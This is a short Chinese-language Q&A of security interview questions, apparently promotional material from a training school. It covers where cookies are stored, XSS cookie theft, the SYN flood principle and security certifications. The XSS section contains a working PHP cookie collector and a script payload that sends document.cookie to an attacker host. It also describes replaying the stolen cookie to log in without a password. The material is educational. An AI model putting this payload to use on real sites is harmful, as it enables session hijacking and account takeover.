1.cookie 存在哪里？可以打開嗎？

　　C:\Users\用戶名\AppData\Roaming\Microsoft\Windows\Cookies

　　工具--文件夾選項--查看--將隱藏被保護的文件的對勾去掉就會看到 cookies 文件夾。

　　2.xss 如何盜取 cookie？

　　攻擊者代碼：

<?php

$cookie=$_GET['cookie'];

$time=date('Y-m-d g:i:s');

$referer=getenv('HTTP_REFERER');

$cookietxt=fopen('cookie.txt','a');

fwrite($cookietxt,"time:".$time." cookie:".$cookie."

referer:".$referer.""); 注意雙引號，容易出錯

fclose($cookietxt);

?> 

　　腳本端：

<script>

document.write('<img

src="http://ip/cookie.php?cookie='+document.cookie+'" width=0 height=0

border=0 />');

</script> 

　　獲取到 cookie 后，用 firebug 找到 cookie，新建 cookie

　　加入 cookie，用 referer 來提交，無需輸入帳號密碼直接登錄進去！

　　3、SYN 攻擊原理

　　SYN 攻擊屬于 DOS 攻擊的一種，它利用 TCP 協議缺陷，通過發送大量的半連接請求，耗費 CPU 和內存資源。

　　SYN 攻擊除了能影響主機外，還可以危害路由器、防火墻等網絡系統，事實上SYN 攻擊并不管目標是什么系統，只要這些系統打開 TCP 服務就可以實施。從上圖可看到，服務器接收到連接請求(syn=j)，將此信息加入未連接隊列，并發送請求包給客戶(syn=k,ack=j+1)，此時進入SYN_RECV 狀態。

　　當服務器未收到客戶端的確認包時，重發請求包，一直到超時，才將此條目從未連接隊列刪除。

　　配合 IP 欺騙，SYN 攻擊能達到很好的效果，通常，客戶端在短時間內偽造大量不存在的 IP 地址，向服務器不斷地發送 syn 包，服務器回復確認包，并等待客戶的確認，由于源地址是不存在的，服務器需要不斷的重發直至超時，這些偽造的 SYN 包將長時間占用未連接隊列，正常的 SYN 請求被丟棄，目標系統運行緩慢，嚴重者引起網絡堵塞甚至系統癱瘓。

　　4.證書要考哪些？

　　信息安全國際第一認證——CISSP

　　信息安全國內認證——CISAW

　　信息安全國內認證——CISP

　　信息安全技術實操認證新貴——Security+

　　IT 審計人員的必備之證——CISA

　　更多關于網絡安全培訓的問題，歡迎咨詢千鋒教育在線名師。千鋒教育擁有多年IT培訓服務經驗，采用全程面授高品質、高體驗培養模式，擁有國內一體化教學管理及學員服務，助力更多學員實現高薪夢想。